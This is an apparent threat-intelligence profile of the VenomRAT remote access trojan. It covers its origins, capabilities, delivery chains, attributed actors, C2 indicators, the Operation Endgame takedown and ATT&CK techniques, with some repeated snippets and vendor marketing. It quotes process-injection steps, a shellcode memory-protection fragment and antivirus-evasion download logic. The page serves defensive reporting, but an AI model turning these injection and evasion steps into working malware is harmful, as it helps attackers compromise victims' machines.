VenomRAT
VenomRAT is a commodity Windows remote access trojan (RAT) used by multiple cybercriminal actors and identified in 2020. Multiple sources in the content describe it as based on or derived from Quasar RAT, with additional reporting and analysis also placing it in the AsyncRAT-derived ecosystem and noting it was likely inspired by DcRat. It is a .NET malware family that has been observed in email- and web-delivered campaigns since at least 2022 in Proofpoint data.
High-confidence capabilities described in the content include information gathering, credential theft, exfiltration, lateral movement, follow-on payload delivery, keylogging, screen capture, hidden VNC/hVNC functionality in the broader Venom suite, and remote control of infected systems. Some variants reportedly include ransomware functionality. Technical analysis in the content also notes VenomRAT-related configuration and hunting artifacts such as .conf files under AppData\Roaming, including names like DataLogs.conf and hvnc.conf, and a VenomRAT-specific encryption salt string such as "VenomRATByVenom" in at least one analyzed sample. One analyzed sample had metadata including InternalName/OriginalFilename "ClientAny.exe" and ProductVersion "6.0.5".
Observed infection vectors in the content include phishing campaigns, malicious websites, tax-themed lures, JavaScript files that spawn PowerShell to download and execute the malware, WebDAV- and Cloudflare Tunnel-based delivery chains, Python-based loaders, and trojanized software installers including fake or pirated Internet Download Manager packages. VenomRAT has also been recovered as a payload in multi-stage loader chains using Donut shellcode and Early Bird APC injection into explorer.exe.
The malware is associated with several cybercrime operations and clusters in the content. Proofpoint identifies TA558 as the most prominent distributor in its telemetry, with additional use by TA2541 and unattributed actors. VenomRAT also appeared in SERPENTINE#CLOUD campaigns alongside AsyncRAT, XWorm, DcRat, PureHVNC, Violet RAT, and PureCrypter, and in Kiss Loader activity. Infrastructure reporting links VenomRAT to multi-family C2 environments, including 178.22.24.175 in Russian ASN AS209290 and other hosts such as 178.16.55.160 and DuckDNS-based C2s in later campaigns.
Law enforcement action under Operation Endgame targeted VenomRAT infrastructure in November 2025. The content states authorities disrupted more than 1,000 servers tied to Rhadamanthys, VenomRAT, and Elysium; took down VenomRAT-related domains remotesystem[.]in and venomlicense[.]com; and arrested the suspected creator in Greece. Separate reporting in the content ties the broader Venom software suite to a developer later indicted in France, where the suite was marketed as remote administration tooling but included VenomRAT, stealer functionality, hVNC capability, and password theft features targeting 22 software products.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022... VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads. Some VenomRAT variants contain ransomware functionality.
VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022... VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads. Some VenomRAT variants contain ransomware functionality.
The toolkit includes PureLogs, PureHVNC, and repackaged commodity RATs (AsyncRAT, VenomRAT, DcRat, XWorm).
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
4 techniques
Initial Access
« VenomRAT ». Ce programme malveillant identifié en 2020 était principalement « diffusé via des campagnes d'hameçonnage ou de sites Internet malveillants »
Proofpoint frequently observes VenomRAT in email campaign data... TA558 VenomRAT campaigns typically include 1,000 messages or less with lures in Portuguese, Spanish, and occasionally English.
Execution
8 techniques
Execution
The batch stagers are the initial execution layer. 29 .bat files recovered across six evidence directories deduplicate to 13 unique templates in four categories.
When executed, it establishes a connection to an external file share, typically via WebDAV, to download an LNK or VBS file.
When executed, the LNK/VBS executes a BAT or CMD file that downloads a Python installer package and a series of Python scripts leading to malware installation.
In recent campaigns, messages contained URLs leading to a JavaScript file. If executed, the file spawned PowerShell to download and run VenomRAT.
allocate RWX memory, write shellcode via WriteProcessMemory ... ctypes.windll.kernel32.VirtualProtect(... 0x40, # PAGE_EXECUTE_READWRITE ... )
Persistence
1 technique
Persistence
Privilege Escalation
4 techniques
Privilege Escalation
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
Process Injection (T1055.012): CreateProcessAsUserW → Create suspended target process; WriteProcessMemory → Write payload into target address space; SetThreadContext → Redirect execution to payload entry point; ResumeThread → Resume execution under target process identity
Stealth
13 techniques
Stealth
Wave 4/5 introduces the deepest nesting observed in the campaign. The Nov19 Donut instances deliver native x64 PE wrappers instead of .NET assemblies directly... Layer 2: Kramer decode (hex -> unicode shift -> rotation -> RC4 -> base64)
Defense Evasion Obfuscated Files: Encrypted Payload T1027.013 1–6 Multi-layer encryption (XOR, AES, Donut/Chaskey)
Defense Evasion Masquerading: Double Extension T1036.007 1–6 .pdf.lnk, .pdf.wsh, .PDF.lnk
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
Process Injection (T1055.012): CreateProcessAsUserW → Create suspended target process; WriteProcessMemory → Write payload into target address space; SetThreadContext → Redirect execution to payload entry point; ResumeThread → Resume execution under target process identity
[Stage 3: Batch Downloader] - Deletes .bat files post-execution (anti-forensics)
Defense Evasion System Binary Proxy Execution: Wscript T1218.005 1–4, 6 wscript.exe WSH/WSF execution
If detected, downloads abb11.zip (OBKS-only, Avast-safe profile). If not, downloads quz11.zip (full WBKS + BKSNO deployment).
Checks for AvastUI.exe and AVGUI.exe via tasklist. If detected, downloads abb11.zip (OBKS-only, Avast-safe profile). If not, downloads quz11.zip
[Stage 3: Batch Downloader] - Hides payload directories with attrib +h
Defense Impairment
1 technique
Defense Impairment
Discovery
2 techniques
Discovery
Command and Control
6 techniques
Command and Control
C2 Tracker is a free-to-use-community-driven IOC feed that uses Shodan and Censys searches to collect IP addresses of known malware/botnet/C2 infrastructure.
C2 Application Layer Protocol: Web Protocols T1071.001 1–6 WebDAV over HTTPS for staging
If executed, the file spawned PowerShell to download and run VenomRAT.
« Nous créons des outils d'administration à distance et des exploits par passion pour le domaine des tests d'intrusion »
IOCs tracked for this family
33 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
55 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access tool whose infrastructure was shut down in a prior Operation Endgame action.
Named RAT/botnet malware operation targeted by Operation Endgame.
Malware suite marketed as remote administration and penetration-testing tools but described as clearly oriented toward cybercriminal use. It includes a RAT/trojan component, password-stealing capabilities targeting 22 applications, crypto-wallet theft functionality, and an hVNC module enabling covert use of infected machines.
From the same authors Blockchain and Node.js abused by Tsundere: an emerging botnet ... RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.